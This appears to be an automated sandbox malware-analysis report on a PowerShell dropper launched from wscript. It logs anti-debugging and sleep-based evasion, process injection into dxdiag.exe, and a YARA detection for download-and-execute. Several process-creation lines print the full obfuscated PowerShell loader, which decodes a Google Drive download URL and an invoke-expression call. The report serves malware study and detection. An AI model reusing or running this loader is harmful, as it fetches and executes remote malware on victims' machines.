                Source: C:\Windows\SysWOW64\dxdiag.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\dxdiag.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\dxdiag.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\dxdiag.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\dxdiag.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\dxdiag.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\dxdiag.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\dxdiag.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\dxdiag.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\dxdiag.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\dxdiag.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\dxdiag.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\dxdiag.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\dxdiag.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\dxdiag.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\dxdiag.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\dxdiag.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\dxdiag.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\dxdiag.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\dxdiag.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\dxdiag.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\dxdiag.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\dxdiag.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\dxdiag.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\dxdiag.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\dxdiag.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\dxdiag.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\dxdiag.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\dxdiag.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\dxdiag.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\dxdiag.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\dxdiag.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\dxdiag.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\dxdiag.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\dxdiag.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\dxdiag.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\dxdiag.exeProcess information set: NOGPFAULTERRORBOXJump to behavior

                Malware Analysis System Evasion

                barindex
                Switches to a custom stack to bypass stack traces
                Source: C:\Windows\SysWOW64\dxdiag.exeAPI/Special instruction interceptor: Address: 53C1D7A
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
                Source: C:\Windows\System32\wscript.exeWindow found: window name: WSH-TimerJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 6233Jump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 3630Jump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 6463Jump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 3368Jump to behavior
                Source: C:\Windows\SysWOW64\dxdiag.exeWindow / User API: threadDelayed 4893Jump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7088Thread sleep time: -5534023222112862s >= -30000sJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 6672Thread sleep time: -1844674407370954s >= -30000sJump to behavior
                Source: C:\Windows\SysWOW64\dxdiag.exe TID: 2284Thread sleep count: 4893 > 30Jump to behavior
                Source: C:\Windows\SysWOW64\dxdiag.exe TID: 5280Thread sleep time: -60000s >= -30000sJump to behavior
                Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
                Source: C:\Windows\SysWOW64\dxdiag.exeLast function: Thread delayed
                Source: C:\Windows\SysWOW64\dxdiag.exeLast function: Thread delayed
                Source: C:\Windows\SysWOW64\dxdiag.exeThread sleep count: Count: 4893 delay: -5Jump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
                Source: C:\Windows\SysWOW64\dxdiag.exeThread delayed: delay time: 60000Jump to behavior
                Source: powershell.exe, 00000002.00000002.2210694787.000002B4254F5000.00000004.00000020.00020000.00000000.sdmp, dxdiag.exe, 00000012.00000002.3285682620.0000000005EF8000.00000004.00000020.00020000.00000000.sdmp, dxdiag.exe, 00000012.00000002.3285682620.0000000005F52000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW
                Source: powershell.exe, 00000002.00000002.2250232300.000002B43F505000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information queried: ProcessInformationJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess queried: DebugPortJump to behavior
                Source: C:\Windows\SysWOW64\dxdiag.exeProcess queried: DebugPortJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 4_2_030CD338 LdrInitializeThunk,LdrInitializeThunk,4_2_030CD338

                HIPS / PFW / Operating System Protection Evasion

                barindex
                Yara detected Powershell download and execute
                Source: Yara matchFile source: amsi64_3032.amsi.csv, type: OTHER
                Source: Yara matchFile source: Process Memory Space: powershell.exe PID: 3032, type: MEMORYSTR
                Source: Yara matchFile source: Process Memory Space: powershell.exe PID: 6412, type: MEMORYSTR
                Writes to foreign memory regions
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeMemory written: C:\Windows\SysWOW64\dxdiag.exe base: 3200000Jump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeMemory written: C:\Windows\SysWOW64\dxdiag.exe base: 2F1FABCJump to behavior
                Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "<#Kechel Prsidentposten Uigennemsigtighederne #>;$Overdistantly='Interfrontal';<#Gadshill Slaabrokstil Delebrns Porulous Dolkestdet #>;$Vinduesopstninger=$host.PrivateData;If ($Vinduesopstninger) {$Stedlig++;}function Jomfruhindes($Porteranthus){$Aruspex=$Acetnaphthalide+$Porteranthus.Length-$Stedlig;for( $Nytteomraaders=5;$Nytteomraaders -lt $Aruspex;$Nytteomraaders+=6){$Indpresse+=$Porteranthus[$Nytteomraaders];}$Indpresse;}function Electroendosmosis($Rookus){ & ($Bohor) ($Rookus);}$Dinder=Jomfruhindes 'Pac iMEnhjroTretizalkohi.nudelRedillAlfajaFjern/ dopt5She.t. Kaff0 Stoi Anf l(fundaWIslaniStra nLeechdHa aroReshiwF,ifisSemiw UndeNStaveTDesti Affi1.rvty0B myn.Trykk0Diflu;Hi si PolydWCogiti CypenForka6Genda4 Isab; Afst PresnxM elh6Uno n4Yello;Fl,tt steorDesp vdanse: Svi 1Subbi2Fopsc1Lowba.T,mme0Cyto )retri Men GAdenaeUddancAssemk Raggo Afdo/Excl 2 Til 0Psamm1Sadle0 Gri 0.uscl1 Me u0 Org 1 Clay GeskeFPonchiI,currBuh.seKonomfY glioKu,stxFusin/F.rsg1Krush2Demo.1 Fili.Micro0Rad o ';$Amerikanismens=Jomfruhindes ' Br,sUAnpris EiriENedrirUrchi- SulpaFjrteGPreteEDatabN maritQu ru ';$samlsnings=Jomfruhindes 'FantahIliost.adbatUnderpTuttisGiral:Gonor/Etho./ Kom dZoophr NickiA,tagv,ubope Fort. DuragHoldnoBrodeoSe,vegSodallFreefeHelve..atiocNeph oElse.mMic,o/nat ouArtotcReemp?RingoeR asyxO,erhpEccafo Or arFornjtMarli=LselidUdvikoOc.oiw.ynton SneklInteroM llea.erskdPr gr&B.esniParasd S et= Bobs1 dammeAnl gx Ud,rF.lockxJagtlLSuddeodec m5StrstDTo glnUne p8 cham7F rsaF le iWHysteQ ,tiks ovacK hypeOFinanFFork 9RizzaGN nsuFFindi6RetaiRspillfModst-Nyoprp UnagH K ipgRadioXHydroqFe apJ Reap8Kyste ';$aesthesia=Jomfruhindes 'Proce>N nna ';$Bohor=Jomfruhindes 'unintIkandiEher iXV,ndf ';$Yammers='Breme';$rytmiseret='\Drgs.Trs';Electroendosmosis (Jomfruhindes 'fa tb$Forskg IsoblSpilloKikonbKjer.aspro l nth:UnimpAOkseblForeilPda oeTrussnHess dFemkaesal.t=Begrl$MiljfeMetron,edriv rill:Glosaa P otpSul mp Pja d ApioaSukketlithoaSluse+ rdig$UdskirEnt tyJentrtHokeymboo.ei ritis Afvieun errbaldreKtex,tsvedj ');Electroendosmosis (Jomfruhindes 'Origi$SwashgUnderlScyl oTes dbWhitmaPersilUdtmm:SvaghTSvrmer La naBo ilcOmg dtberaks onox=Bevrt$Sa lesOegenaDeponmDipetlS,agtsRationBasiliHghsrn Sp cg.nifosPhilo.Tilsks Persp KliplTidspi VivatOpryk(Tre,j$Sty taExen.e Romas dvlgt jollhUdladeUdmatsUntemi eardaUnivo)Cre,s ');Electroendosmosis (Jomfruhindes 'Scot.[KikseNAedeseSkonstLilli.Re isSSkanke ejskr Stenv Vertipla.icSejlae As.rPDec,mo SansimaternAmphitBrynjMHaanda RefonSkiftaHoftegForaaeRagmar .off]Maane:Sa.me:rhopaS TffeeTennicCh,tou ,redr Uncoi ConctOphthyTur eP FrasrPlaygoHenbatGifttoSanitc Snoro Hom lGurge Nylo,=Chizz Pu pu[ GildNplisseDeepet,rape.EncefSparadeStinkc Capsu Tru rDepriiB.mbetstatsyAngelPNehmirStampo.pritt ,ubloElectc.olleoVoldelP eudT,oneayGoba,pFdbfleKryds] Ahnf:Titan:RenovTConarlBrimls blte1Inger2Clina ');$samlsnings=$Tracts[0];$Gaveled=(JomfruJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\SysWOW64\msiexec.exe "C:\Windows\syswow64\msiexec.exe"Jump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\SysWOW64\msiexec.exe "C:\Windows\syswow64\msiexec.exe"Jump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\SysWOW64\msiexec.exe "C:\Windows\syswow64\msiexec.exe"Jump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\SysWOW64\msiexec.exe "C:\Windows\syswow64\msiexec.exe"Jump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\SysWOW64\msiexec.exe "C:\Windows\syswow64\msiexec.exe"Jump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\SysWOW64\msiexec.exe "C:\Windows\syswow64\msiexec.exe"Jump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\SysWOW64\msiexec.exe "C:\Windows\syswow64\msiexec.exe"Jump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\SysWOW64\msiexec.exe "C:\Windows\syswow64\msiexec.exe"Jump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\SysWOW64\msiexec.exe "C:\Windows\syswow64\msiexec.exe"Jump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\SysWOW64\msiexec.exe "C:\Windows\syswow64\msiexec.exe"Jump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\SysWOW64\msiexec.exe "C:\Windows\syswow64\msiexec.exe"Jump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\SysWOW64\dxdiag.exe "C:\Windows\syswow64\dxdiag.exe"Jump to behavior
                Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "c:\windows\system32\windowspowershell\v1.0\powershell.exe" "<#kechel prsidentposten uigennemsigtighederne #>;$overdistantly='interfrontal';<#gadshill slaabrokstil delebrns porulous dolkestdet #>;$vinduesopstninger=$host.privatedata;if ($vinduesopstninger) {$stedlig++;}function jomfruhindes($porteranthus){$aruspex=$acetnaphthalide+$porteranthus.length-$stedlig;for( $nytteomraaders=5;$nytteomraaders -lt $aruspex;$nytteomraaders+=6){$indpresse+=$porteranthus[$nytteomraaders];}$indpresse;}function electroendosmosis($rookus){ & ($bohor) ($rookus);}$dinder=jomfruhindes 'pac imenhjrotretizalkohi.nudelredillalfajafjern/ dopt5she.t. kaff0 stoi anf l(fundawislanistra nleechdha aroreshiwf,ifissemiw undenstavetdesti affi1.rvty0b myn.trykk0diflu;hi si polydwcogiti cypenforka6genda4 isab; afst presnxm elh6uno n4yello;fl,tt steordesp vdanse: svi 1subbi2fopsc1lowba.t,mme0cyto )retri men gadenaeuddancassemk raggo afdo/excl 2 til 0psamm1sadle0 gri 0.uscl1 me u0 org 1 clay geskefponchii,currbuh.sekonomfy glioku,stxfusin/f.rsg1krush2demo.1 fili.micro0rad o ';$amerikanismens=jomfruhindes ' br,suanpris eirienedrirurchi- sulpafjrtegpreteedatabn maritqu ru ';$samlsnings=jomfruhindes 'fantahiliost.adbatunderptuttisgiral:gonor/etho./ kom dzoophr nickia,tagv,ubope fort. duragholdnobrodeose,vegsodallfreefehelve..atiocneph oelse.mmic,o/nat ouartotcreemp?ringoer asyxo,erhpeccafo or arfornjtmarli=lselidudvikooc.oiw.ynton sneklinterom llea.erskdpr gr&b.esniparasd s et= bobs1 dammeanl gx ud,rf.lockxjagtllsuddeodec m5strstdto glnune p8 cham7f rsaf le iwhysteq ,tiks ovack hypeofinanffork 9rizzagn nsuffindi6retairspillfmodst-nyoprp unagh k ipgradioxhydroqfe apj reap8kyste ';$aesthesia=jomfruhindes 'proce>n nna ';$bohor=jomfruhindes 'unintikandieher ixv,ndf ';$yammers='breme';$rytmiseret='\drgs.trs';electroendosmosis (jomfruhindes 'fa tb$forskg isoblspillokikonbkjer.aspro l nth:unimpaokseblforeilpda oetrussnhess dfemkaesal.t=begrl$miljfemetron,edriv rill:glosaa p otpsul mp pja d apioasukketlithoasluse+ rdig$udskirent tyjentrthokeymboo.ei ritis afvieun errbaldrektex,tsvedj ');electroendosmosis (jomfruhindes 'origi$swashgunderlscyl otes dbwhitmapersiludtmm:svaghtsvrmer la nabo ilcomg dtberaks onox=bevrt$sa lesoegenadeponmdipetls,agtsrationbasilihghsrn sp cg.nifosphilo.tilsks persp klipltidspi vivatopryk(tre,j$sty taexen.e romas dvlgt jollhudladeudmatsuntemi eardaunivo)cre,s ');electroendosmosis (jomfruhindes 'scot.[kiksenaedeseskonstlilli.re issskanke ejskr stenv vertipla.icsejlae as.rpdec,mo sansimaternamphitbrynjmhaanda refonskiftahoftegforaaeragmar .off]maane:sa.me:rhopas tffeetennicch,tou ,redr uncoi conctophthytur ep frasrplaygohenbatgifttosanitc snoro hom lgurge nylo,=chizz pu pu[ gildnplissedeepet,rape.encefsparadestinkc capsu tru rdepriib.mbetstatsyangelpnehmirstampo.pritt ,ubloelectc.olleovoldelp eudt,oneaygoba,pfdbflekryds] ahnf:titan:renovtconarlbrimls blte1inger2clina ');$samlsnings=$tracts[0];$gaveled=(jomfru
                Source: unknownProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "c:\windows\syswow64\windowspowershell\v1.0\powershell.exe" "<#kechel prsidentposten uigennemsigtighederne #>;$overdistantly='interfrontal';<#gadshill slaabrokstil delebrns porulous dolkestdet #>;$vinduesopstninger=$host.privatedata;if ($vinduesopstninger) {$stedlig++;}function jomfruhindes($porteranthus){$aruspex=$acetnaphthalide+$porteranthus.length-$stedlig;for( $nytteomraaders=5;$nytteomraaders -lt $aruspex;$nytteomraaders+=6){$indpresse+=$porteranthus[$nytteomraaders];}$indpresse;}function electroendosmosis($rookus){ & ($bohor) ($rookus);}$dinder=jomfruhindes 'pac imenhjrotretizalkohi.nudelredillalfajafjern/ dopt5she.t. kaff0 stoi anf l(fundawislanistra nleechdha aroreshiwf,ifissemiw undenstavetdesti affi1.rvty0b myn.trykk0diflu;hi si polydwcogiti cypenforka6genda4 isab; afst presnxm elh6uno n4yello;fl,tt steordesp vdanse: svi 1subbi2fopsc1lowba.t,mme0cyto )retri men gadenaeuddancassemk raggo afdo/excl 2 til 0psamm1sadle0 gri 0.uscl1 me u0 org 1 clay geskefponchii,currbuh.sekonomfy glioku,stxfusin/f.rsg1krush2demo.1 fili.micro0rad o ';$amerikanismens=jomfruhindes ' br,suanpris eirienedrirurchi- sulpafjrtegpreteedatabn maritqu ru ';$samlsnings=jomfruhindes 'fantahiliost.adbatunderptuttisgiral:gonor/etho./ kom dzoophr nickia,tagv,ubope fort. duragholdnobrodeose,vegsodallfreefehelve..atiocneph oelse.mmic,o/nat ouartotcreemp?ringoer asyxo,erhpeccafo or arfornjtmarli=lselidudvikooc.oiw.ynton sneklinterom llea.erskdpr gr&b.esniparasd s et= bobs1 dammeanl gx ud,rf.lockxjagtllsuddeodec m5strstdto glnune p8 cham7f rsaf le iwhysteq ,tiks ovack hypeofinanffork 9rizzagn nsuffindi6retairspillfmodst-nyoprp unagh k ipgradioxhydroqfe apj reap8kyste ';$aesthesia=jomfruhindes 'proce>n nna ';$bohor=jomfruhindes 'unintikandieher ixv,ndf ';$yammers='breme';$rytmiseret='\drgs.trs';electroendosmosis (jomfruhindes 'fa tb$forskg isoblspillokikonbkjer.aspro l nth:unimpaokseblforeilpda oetrussnhess dfemkaesal.t=begrl$miljfemetron,edriv rill:glosaa p otpsul mp pja d apioasukketlithoasluse+ rdig$udskirent tyjentrthokeymboo.ei ritis afvieun errbaldrektex,tsvedj ');electroendosmosis (jomfruhindes 'origi$swashgunderlscyl otes dbwhitmapersiludtmm:svaghtsvrmer la nabo ilcomg dtberaks onox=bevrt$sa lesoegenadeponmdipetls,agtsrationbasilihghsrn sp cg.nifosphilo.tilsks persp klipltidspi vivatopryk(tre,j$sty taexen.e romas dvlgt jollhudladeudmatsuntemi eardaunivo)cre,s ');electroendosmosis (jomfruhindes 'scot.[kiksenaedeseskonstlilli.re issskanke ejskr stenv vertipla.icsejlae as.rpdec,mo sansimaternamphitbrynjmhaanda refonskiftahoftegforaaeragmar .off]maane:sa.me:rhopas tffeetennicch,tou ,redr uncoi conctophthytur ep frasrplaygohenbatgifttosanitc snoro hom lgurge nylo,=chizz pu pu[ gildnplissedeepet,rape.encefsparadestinkc capsu tru rdepriib.mbetstatsyangelpnehmirstampo.pritt ,ubloelectc.olleovoldelp eudt,oneaygoba,pfdbflekryds] ahnf:titan:renovtconarlbrimls blte1inger2clina ');$samlsnings=$tracts[0];$gaveled=(jomfru
                Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "c:\windows\system32\windowspowershell\v1.0\powershell.exe" "<#kechel prsidentposten uigennemsigtighederne #>;$overdistantly='interfrontal';<#gadshill slaabrokstil delebrns porulous dolkestdet #>;$vinduesopstninger=$host.privatedata;if ($vinduesopstninger) {$stedlig++;}function jomfruhindes($porteranthus){$aruspex=$acetnaphthalide+$porteranthus.length-$stedlig;for( $nytteomraaders=5;$nytteomraaders -lt $aruspex;$nytteomraaders+=6){$indpresse+=$porteranthus[$nytteomraaders];}$indpresse;}function electroendosmosis($rookus){ & ($bohor) ($rookus);}$dinder=jomfruhindes 'pac imenhjrotretizalkohi.nudelredillalfajafjern/ dopt5she.t. kaff0 stoi anf l(fundawislanistra nleechdha aroreshiwf,ifissemiw undenstavetdesti affi1.rvty0b myn.trykk0diflu;hi si polydwcogiti cypenforka6genda4 isab; afst presnxm elh6uno n4yello;fl,tt steordesp vdanse: svi 1subbi2fopsc1lowba.t,mme0cyto )retri men gadenaeuddancassemk raggo afdo/excl 2 til 0psamm1sadle0 gri 0.uscl1 me u0 org 1 clay geskefponchii,currbuh.sekonomfy glioku,stxfusin/f.rsg1krush2demo.1 fili.micro0rad o ';$amerikanismens=jomfruhindes ' br,suanpris eirienedrirurchi- sulpafjrtegpreteedatabn maritqu ru ';$samlsnings=jomfruhindes 'fantahiliost.adbatunderptuttisgiral:gonor/etho./ kom dzoophr nickia,tagv,ubope fort. duragholdnobrodeose,vegsodallfreefehelve..atiocneph oelse.mmic,o/nat ouartotcreemp?ringoer asyxo,erhpeccafo or arfornjtmarli=lselidudvikooc.oiw.ynton sneklinterom llea.erskdpr gr&b.esniparasd s et= bobs1 dammeanl gx ud,rf.lockxjagtllsuddeodec m5strstdto glnune p8 cham7f rsaf le iwhysteq ,tiks ovack hypeofinanffork 9rizzagn nsuffindi6retairspillfmodst-nyoprp unagh k ipgradioxhydroqfe apj reap8kyste ';$aesthesia=jomfruhindes 'proce>n nna ';$bohor=jomfruhindes 'unintikandieher ixv,ndf ';$yammers='breme';$rytmiseret='\drgs.trs';electroendosmosis (jomfruhindes 'fa tb$forskg isoblspillokikonbkjer.aspro l nth:unimpaokseblforeilpda oetrussnhess dfemkaesal.t=begrl$miljfemetron,edriv rill:glosaa p otpsul mp pja d apioasukketlithoasluse+ rdig$udskirent tyjentrthokeymboo.ei ritis afvieun errbaldrektex,tsvedj ');electroendosmosis (jomfruhindes 'origi$swashgunderlscyl otes dbwhitmapersiludtmm:svaghtsvrmer la nabo ilcomg dtberaks onox=bevrt$sa lesoegenadeponmdipetls,agtsrationbasilihghsrn sp cg.nifosphilo.tilsks persp klipltidspi vivatopryk(tre,j$sty taexen.e romas dvlgt jollhudladeudmatsuntemi eardaunivo)cre,s ');electroendosmosis (jomfruhindes 'scot.[kiksenaedeseskonstlilli.re issskanke ejskr stenv vertipla.icsejlae as.rpdec,mo sansimaternamphitbrynjmhaanda refonskiftahoftegforaaeragmar .off]maane:sa.me:rhopas tffeetennicch,tou ,redr uncoi conctophthytur ep frasrplaygohenbatgifttosanitc snoro hom lgurge nylo,=chizz pu pu[ gildnplissedeepet,rape.encefsparadestinkc capsu tru rdepriib.mbetstatsyangelpnehmirstampo.pritt ,ubloelectc.olleovoldelp eudt,oneaygoba,pfdbflekryds] ahnf:titan:renovtconarlbrimls blte1inger2clina ');$samlsnings=$tracts[0];$gaveled=(jomfruJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformationJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformationJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformationJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformationJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
